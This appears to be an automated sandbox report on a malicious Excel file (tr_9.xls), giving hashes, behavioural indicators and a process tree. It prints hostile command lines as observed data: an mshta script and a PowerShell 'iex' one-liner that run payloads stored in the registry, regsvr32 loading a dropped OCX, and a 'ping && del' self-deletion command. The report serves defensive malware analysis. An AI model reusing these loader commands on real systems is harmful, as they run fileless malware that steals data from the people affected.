Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
  max time kernel: 151s
  max time network: 144s
  platform: windows7_x64
  resource: win7v200430
  submitted: 14/07/2020, 05:19
Static task: static1
Behavioral task: behavioral1
  Sample: tr_9.xls
  Resource: win7v200430
General
  Target: tr_9.xls
  Size: 90KB
  MD5: 9cf44f1dd44ea313a0d931130ebb1aaf
  SHA1: 0243be928d28f5b75d4d58af445b6d1b0350ee2c
  SHA256: c18e2c68d372caf4cfd5ead1dcfe93d369a93fdc9198c76152283c4e747ecad5
  SHA512: e7644dfae5808829f6d5ee129ff2e250da1dd257a3657becec472a562404aa12b6e7ab7b6eba5d93e4a39b02e89afa0b16a08e89adb150e271548bcd3cc9516f
Malware Config
Signatures
Suspicious use of AdjustPrivilegeToken 33 IoCs
(identical rows collapsed; occurrences = repeat count in the raw log)
description | pid | Process | occurrences
Token: SeImpersonatePrivilege | 1852 | svchost.exe | 4
Token: SeTcbPrivilege | 1852 | svchost.exe | 4
Token: SeChangeNotifyPrivilege | 1852 | svchost.exe | 4
Token: SeCreateTokenPrivilege | 1852 | svchost.exe | 4
Token: SeBackupPrivilege | 1852 | svchost.exe | 4
Token: SeRestorePrivilege | 1852 | svchost.exe | 4
Token: SeIncreaseQuotaPrivilege | 1852 | svchost.exe | 4
Token: SeAssignPrimaryTokenPrivilege | 1852 | svchost.exe | 4
Token: SeDebugPrivilege | 1964 | powershell.exe | 1

Suspicious use of FindShellTrayWindow 7 IoCs
pid | Process | occurrences
1864 | iexplore.exe | 3
1316 | Explorer.EXE | 4

Suspicious use of SendNotifyMessage 4 IoCs
pid | Process | occurrences
1316 | Explorer.EXE | 4

Checks whether UAC is enabled 3 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | IEXPLORE.EXE
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | iexplore.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | IEXPLORE.EXE
Modifies Internet Explorer settings
(all ioc paths below are relative to \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer)
description | ioc | Process
Set value (str) | \Main\WindowsSearch\Version = "WS not running" | IEXPLORE.EXE
Key created | \IETld\LowMic | iexplore.exe
Key created | \Main\WindowsSearch | IEXPLORE.EXE
Key created | \Main | IEXPLORE.EXE
Set value (data) | \TabbedBrowsing\NewTabPage\LastProcessed = c0a14013af59d601 | iexplore.exe
Key created | \LowRegistry | iexplore.exe
Key created | \Toolbar | iexplore.exe
Key created | \PageSetup | iexplore.exe
Set value (int) | \Main\CompatibilityFlags = "0" | iexplore.exe
Key created | \Main\WindowsSearch | iexplore.exe
Set value (int) | \Recovery\PendingRecovery\AdminActive = "0" | iexplore.exe
Set value (int) | \MINIE\TabBandWidth = "500" | iexplore.exe
Set value (data) | \TabbedBrowsing\NewTabPage\MFV = [value elided] | iexplore.exe
Key created | \BrowserEmulation\LowMic | iexplore.exe
Key created | \GPU | iexplore.exe
Set value (data) | \Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 | iexplore.exe
Key created | \DomainSuggestion | iexplore.exe
Set value (str) | \Main\WindowsSearch\Version = "WS not running" | IEXPLORE.EXE
Set value (int) | \DomainSuggestion\NextUpdateDate = "301476121" | iexplore.exe
Key created | \Main | iexplore.exe
Key created | \MINIE | iexplore.exe
Set value (str) | \Main\FullScreen = "no" | iexplore.exe
Key created | \DomainSuggestion\FileNames | iexplore.exe
Set value (str) | \Main\WindowsSearch\Version = "WS not running" | iexplore.exe
Key created | \Main | IEXPLORE.EXE
Key created | \Main\WindowsSearch | IEXPLORE.EXE
Set value (data) | \TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007cf8d5bd09b0364592b95b96ab31238800000000020000000000106600000001000020000000edb18170b9701c56e00af3207ce894ab94f1ef4e83c8184a1fb9509381302ff9000000000e80000000020000200000000af12e3501e14dd74f8c54399be84c42dc7799683b219bca8f5bbf9765d0d3832000000093ffe00c3c2a53b2ab05825b72f684e6a39de7f19b629a03749fab6a7293d15240000000dfa991cb4877c379f9a7c972dbf6fa8a4179feb4f0485b4b554321459ed620a7e44dac636a727fefeeddd549752809bd0e989e51be7ca51e963b3c158ad55f3b | iexplore.exe
Key created | \Main | mshta.exe
Key created | \DomainSuggestion\FileNames\ | iexplore.exe
Set value (str) | \DomainSuggestion\FileNames\en-US = "en-US.1" | iexplore.exe
Key created | \LowRegistry\DOMStorage | iexplore.exe
Key created | \LowRegistry\DontShowMeThisDialogAgain | iexplore.exe
Key created | \Recovery\AdminActive | iexplore.exe
Set value (int) | \Recovery\AdminActive\{4D754BC1-C5A2-11EA-85BB-521955544CF0} = "0" | iexplore.exe
Key created | \Recovery\PendingRecovery | iexplore.exe
Key created | \IntelliForms | iexplore.exe
Key created | \Zoom | iexplore.exe
Set value (data) | \Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 | iexplore.exe
Key created | \TabbedBrowsing | iexplore.exe
Set value (int) | \TabbedBrowsing\NTPFirstRun = "1" | iexplore.exe
Key created | \TabbedBrowsing\NewTabPage | iexplore.exe
Key created | \InternetRegistry | iexplore.exe
Key created | \Toolbar\WebBrowser | iexplore.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
5 | api.ipify.org

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Suspicious use of WriteProcessMemory 91 IoCs
(identical rows collapsed; occurrences = repeat count in the raw log)
description | pid | Process | procid_target | occurrences
PID 1528 wrote to memory of 1232 | 1528 | EXCEL.EXE | 26 | 5
PID 1232 wrote to memory of 1800 | 1232 | regsvr32.exe | 27 | 7
PID 1800 wrote to memory of 1852 | 1800 | regsvr32.exe | 29 | 6
PID 1852 wrote to memory of 572 | 1852 | svchost.exe | 31 | 4
PID 1852 wrote to memory of 1568 | 1852 | svchost.exe | 33 | 6
PID 1852 wrote to memory of 1932 | 1852 | svchost.exe | 34 | 4
PID 1864 wrote to memory of 1232 | 1864 | iexplore.exe | 39 | 4
PID 1864 wrote to memory of 1920 | 1864 | iexplore.exe | 41 | 4
PID 1588 wrote to memory of 1964 | 1588 | mshta.exe | 44 | 3
PID 1964 wrote to memory of 1584 | 1964 | powershell.exe | 46 | 3
PID 1584 wrote to memory of 1748 | 1584 | csc.exe | 47 | 3
PID 1964 wrote to memory of 1008 | 1964 | powershell.exe | 48 | 3
PID 1008 wrote to memory of 1624 | 1008 | csc.exe | 49 | 3
PID 1964 wrote to memory of 1316 | 1964 | powershell.exe | 20 | 3
PID 1316 wrote to memory of 1864 | 1316 | Explorer.EXE | 38 | 3
PID 1316 wrote to memory of 1760 | 1316 | Explorer.EXE | 50 | 6
PID 1760 wrote to memory of 1520 | 1760 | cmd.exe | 52 | 6
PID 1316 wrote to memory of 1972 | 1316 | Explorer.EXE | 53 | 3
PID 1316 wrote to memory of 1964 | 1316 | Explorer.EXE | 54 | 3
PID 1964 wrote to memory of 1472 | 1964 | cmd.exe | 57 | 3
PID 1972 wrote to memory of 1932 | 1972 | cmd.exe | 58 | 3
PID 1316 wrote to memory of 2032 | 1316 | Explorer.EXE | 59 | 3
PID 1316 wrote to memory of 1912 | 1316 | Explorer.EXE | 60 | 3

Suspicious use of SetThreadContext 6 IoCs
description | pid | Process | procid_target
PID 1800 set thread context of 1852 | 1800 | regsvr32.exe | 29
PID 1852 set thread context of 1568 | 1852 | svchost.exe | 33
PID 1964 set thread context of 1316 | 1964 | powershell.exe | 20
PID 1316 set thread context of 1864 | 1316 | Explorer.EXE | 38
PID 1316 set thread context of 1760 | 1316 | Explorer.EXE | 50
PID 1760 set thread context of 1520 | 1760 | cmd.exe | 52
Drops file in System32 directory 1 IoCs
description | ioc | Process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe

Modifies system certificate store
description | ioc | Process
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [value elided] | svchost.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [value elided] | svchost.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | svchost.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | svchost.exe
Runs ping.exe 1 TTPs 1 IoCs
pid | Process
1520 | PING.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid | Process
1528 | EXCEL.EXE

Suspicious use of SetWindowsHookEx 17 IoCs
(identical rows collapsed; occurrences = repeat count in the raw log)
pid | Process | occurrences
1528 | EXCEL.EXE | 5
1864 | iexplore.exe | 6
1232 | IEXPLORE.EXE | 4
1920 | IEXPLORE.EXE | 2

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | 1232 | 1528 | regsvr32.exe | 23

Loads dropped DLL 3 IoCs
pid | Process | occurrences
1800 | regsvr32.exe | 1
1852 | svchost.exe | 2

Suspicious behavior: MapViewOfSection 4 IoCs
pid | Process | occurrences
1964 | powershell.exe | 1
1316 | Explorer.EXE | 2
1760 | cmd.exe | 1

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.

Suspicious behavior: EnumeratesProcesses 8 IoCs
pid | Process | occurrences
1852 | svchost.exe | 5
1964 | powershell.exe | 2
1316 | Explorer.EXE | 1

Executes dropped EXE 1 IoCs
pid | Process
1932 | BNEC76.tmp

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid | Process
1520 | PING.EXE

Checks for installed software on the system 1 TTPs 10 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName | svchost.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName | svchost.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName | svchost.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName | svchost.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName | svchost.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364\DisplayName | svchost.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}\DisplayName | svchost.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName | svchost.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall | svchost.exe
Key enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall | svchost.exe
Processes
(tree; indentation shows parent/child nesting, each entry gives image path, PID, command line and the signatures attributed to that process)

C:\Windows\Explorer.EXE  [PID 1316]
  command line: C:\Windows\Explorer.EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection
  - Suspicious behavior: EnumeratesProcesses

    C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  [PID 1528]
      command line: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\tr_9.xls
      - Suspicious use of WriteProcessMemory
      - Suspicious behavior: AddClipboardFormatListener
      - Suspicious use of SetWindowsHookEx

        C:\Windows\System32\regsvr32.exe  [PID 1232]
          command line: "C:\Windows\System32\regsvr32.exe" /s /i dDdoiBj.ocx
          - Suspicious use of WriteProcessMemory
          - Process spawned unexpected child process

            C:\Windows\SysWOW64\regsvr32.exe  [PID 1800]
              command line: /s /i dDdoiBj.ocx
              - Suspicious use of WriteProcessMemory
              - Suspicious use of SetThreadContext
              - Loads dropped DLL

                C:\Windows\SysWOW64\svchost.exe  [PID 1852]
                  command line: C:\Windows\System32\svchost.exe
                  - Suspicious use of AdjustPrivilegeToken
                  - Suspicious use of WriteProcessMemory
                  - Suspicious use of SetThreadContext
                  - Modifies system certificate store
                  - Loads dropped DLL
                  - Suspicious behavior: EnumeratesProcesses
                  - Checks for installed software on the system

                    C:\Windows\SysWOW64\cmd.exe  [PID 572]
                      command line: cmd /K

                    C:\Windows\SysWOW64\svchost.exe  [PID 1568]
                      command line: C:\Windows\System32\svchost.exe

                    C:\Users\Admin\AppData\Local\Temp\BNEC76.tmp  [PID 1932]
                      command line: C:\Users\Admin\AppData\Local\Temp\BNEC76.tmp
                      - Executes dropped EXE

    C:\Windows\System32\mshta.exe  [PID 1588]
      command line: "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\136B3805-56F5-BDAC-F8F7-EA41AC1BBE05\\\Efsltprf'));if(!window.flag)close()</script>"
      - Modifies Internet Explorer settings
      - Suspicious use of WriteProcessMemory

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 1964]
          command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\136B3805-56F5-BDAC-F8F7-EA41AC1BBE05").dmrctcls))
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          - Suspicious use of SetThreadContext
          - Drops file in System32 directory
          - Suspicious behavior: MapViewOfSection
          - Suspicious behavior: EnumeratesProcesses

            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  [PID 1584]
              command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j2p1xl54\j2p1xl54.cmdline"
              - Suspicious use of WriteProcessMemory

                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  [PID 1748]
                  command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6028.tmp" "c:\Users\Admin\AppData\Local\Temp\j2p1xl54\CSCCA94FCC2B884400FB52EE936881C42C.TMP"

            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  [PID 1008]
              command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vfs4oqtr\vfs4oqtr.cmdline"
              - Suspicious use of WriteProcessMemory

                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  [PID 1624]
                  command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES60F3.tmp" "c:\Users\Admin\AppData\Local\Temp\vfs4oqtr\CSCCC5EE894CFCD45DB87BC5C3C59C1FC7.TMP"

    C:\Windows\System32\cmd.exe  [PID 1760]
      command line: "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\BNEC76.tmp"
      - Suspicious use of SetThreadContext
      - Suspicious behavior: MapViewOfSection

        C:\Windows\system32\PING.EXE  [PID 1520]
          command line: ping localhost -n 5
          - Runs ping.exe
          - Suspicious behavior: CmdExeWriteProcessMemorySpam

    C:\Windows\system32\cmd.exe  [PID 1972]
      command line: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\494.bi1"

        C:\Windows\system32\nslookup.exe  [PID 1932]
          command line: nslookup myip.opendns.com resolver1.opendns.com

    C:\Windows\system32\cmd.exe  [PID 1964]
      command line: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\354.bi1"

        C:\Windows\system32\nslookup.exe  [PID 1472]
          command line: nslookup myip.opendns.com resolver1.opendns.com

    C:\Windows\system32\cmd.exe  [PID 2032]
      command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\354.bi1"

    C:\Windows\system32\cmd.exe  [PID 1912]
      command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\494.bi1"

C:\Program Files\Internet Explorer\iexplore.exe  [PID 1864]
  command line: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
  - Suspicious use of FindShellTrayWindow
  - Checks whether UAC is enabled
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  - Suspicious use of SetWindowsHookEx

    C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE  [PID 1232]
      command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1864 CREDAT:275457 /prefetch:2
      - Checks whether UAC is enabled
      - Modifies Internet Explorer settings
      - Suspicious use of SetWindowsHookEx

    C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE  [PID 1920]
      command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1864 CREDAT:209932 /prefetch:2
      - Checks whether UAC is enabled
      - Modifies Internet Explorer settings
      - Suspicious use of SetWindowsHookEx